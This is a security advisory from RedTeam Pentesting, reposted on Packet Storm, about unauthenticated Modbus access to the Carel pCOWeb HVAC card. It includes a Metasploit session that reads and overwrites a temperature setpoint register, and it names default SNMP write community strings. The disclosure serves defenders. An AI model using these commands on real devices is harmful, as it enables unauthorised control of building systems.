what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Carel pCOWeb HVAC Modbus Interface Authentication Bypass

Carel pCOWeb HVAC Modbus Interface Authentication Bypass
Posted Oct 31, 2019
Site redteam-pentesting.de

The Carel pCOWeb card exposes a Modbus interface to the network. By design, Modbus does not provide authentication, allowing to control the affected system. Version A 1.4.11 - B 1.4.2 is affected.

tags | exploit
SHA-256 | ac9bdcf7f91e77dced7f5e7b4acb37e4fb6d3eaa097d2b650f4b1e1128e1c5f9

Carel pCOWeb HVAC Modbus Interface Authentication Bypass

Change Mirror Download
Advisory: Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC

As part of it's features, the Carel pCOWeb card exposes a Modbus
interface to the network. By design, Modbus does not provide
authentication, allowing to control the affected system.


Details
=======

Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others
Fixed Versions: product obsolete
Vulnerability Type: Unauthenticated Access
Security Risk: high
Vendor URL: https://www.carel.com/product/pcoweb-card
Vendor Status: notified / product obsolete
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-14
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"The pCOWeb card is used to interface the pCO Sistema to networks that
use the HVAC protocols based on the Ethernet physical standard, such as
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated
Web-Server, which both contains the HTML pages relating to the specific
application and allows a browser to be used for remote system
management."
(from the vendor's homepage)

It is used as an OEM module in several different HVAC systems and
considered obsolete by the vendor.


More Details
============

While authentication is required to access the web interface (compare
advisory rt-sa-2019-013 [0]) no authentication is necessary for using
the Modbus interface on TCP port 502, since the Modbus protocol did not
offer any authentication mechanism during the device's lifetime.
The addition of encryption and authentication was only recently proposed
by the Modbus Organization [1].

It is believed that this might be analogous to the problem described in
CVE-2019-13549 for the special case of Rittal SK 3232 products. Other
OEMs are affected, too.


Proof of Concept
================

The web interface of the Carel pCOWeb card allows authenticated users to
read and write many variables of the system via the URL

http://192.168.0.1/config/adminpage.html

This web page seems to provide access to all Modbus variables using
large tables of variables 1-207 for digital, analog and integer
variables, respectively.

By accessing TCP port 502 (Modbus to TCP), it is possible to access
these variables without authentication. This can be done, for example,
by using the Metasploit [2] modbusclient [3] module:

------------------------------------------------------------------------
msf5 > use auxiliary/scanner/scada/modbusclient
msf5 auxiliary(scanner/scada/modbusclient) > set RHOSTS 192.168.0.1
RHOSTS => 192.168.0.1
msf5 auxiliary(scanner/scada/modbusclient) > set DATA_ADDRESS 10
DATA_ADDRESS => 10
msf5 auxiliary(scanner/scada/modbusclient) > run

[*] 192.168.0.1:502 - Sending READ REGISTERS...
[+] 192.168.0.1:502 - 1 register values from address 10 :
[+] 192.168.0.1:502 - [240]
[*] Auxiliary module execution completed
------------------------------------------------------------------------

The returned value matches the set temperature of 24°C multiplied by
ten, as the variable can only hold integers. Using the same module, it
is possible to change the temperature setpoint, too:

------------------------------------------------------------------------
msf5 auxiliary(scanner/scada/modbusclient) > set ACTION WRITE_REGISTER
ACTION => WRITE_REGISTER
msf5 auxiliary(scanner/scada/modbusclient) > set DATA 241
DATA => 241
msf5 auxiliary(scanner/scada/modbusclient) > run

[*] 192.168.0.1:502 - Sending WRITE REGISTER...
[+] 192.168.0.1:502 - Value 241 successfully written at registry address 10
[*] Auxiliary module execution completed
------------------------------------------------------------------------

This allows unauthenticated remote attackers to reconfigure the device.

Depending on OEM integration, different variables might represent
different settings.

Additionally, the system provides SNMP (UDP Port 161) write access with
the SNMP community string "public" or "carel" (depending on version) as
documented in the manual [4] and BACnet over IP (UDP Port 47808).

Workaround
==========

The Carel pCOWeb card should not be connected to networks accessible by
untrusted users.


Fix
===

No updated firmware will be published for pCOWeb Cards, as they are
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.


Security Risk
=============

Since the Modbus protocol implemented in the Carel pCOWeb card does not
offer auhtentication, it is not possible to limit access to the system
to authorized users, allowing attackers to control the system if the
device is accessible via the network. This is considered to pose a high
risk in context of the Carel pCOWeb card.


Timeline
========

2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13549


References
==========

[0] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt
[1] http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf
[2] https://www.metasploit.com/
[3] https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient
[4] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close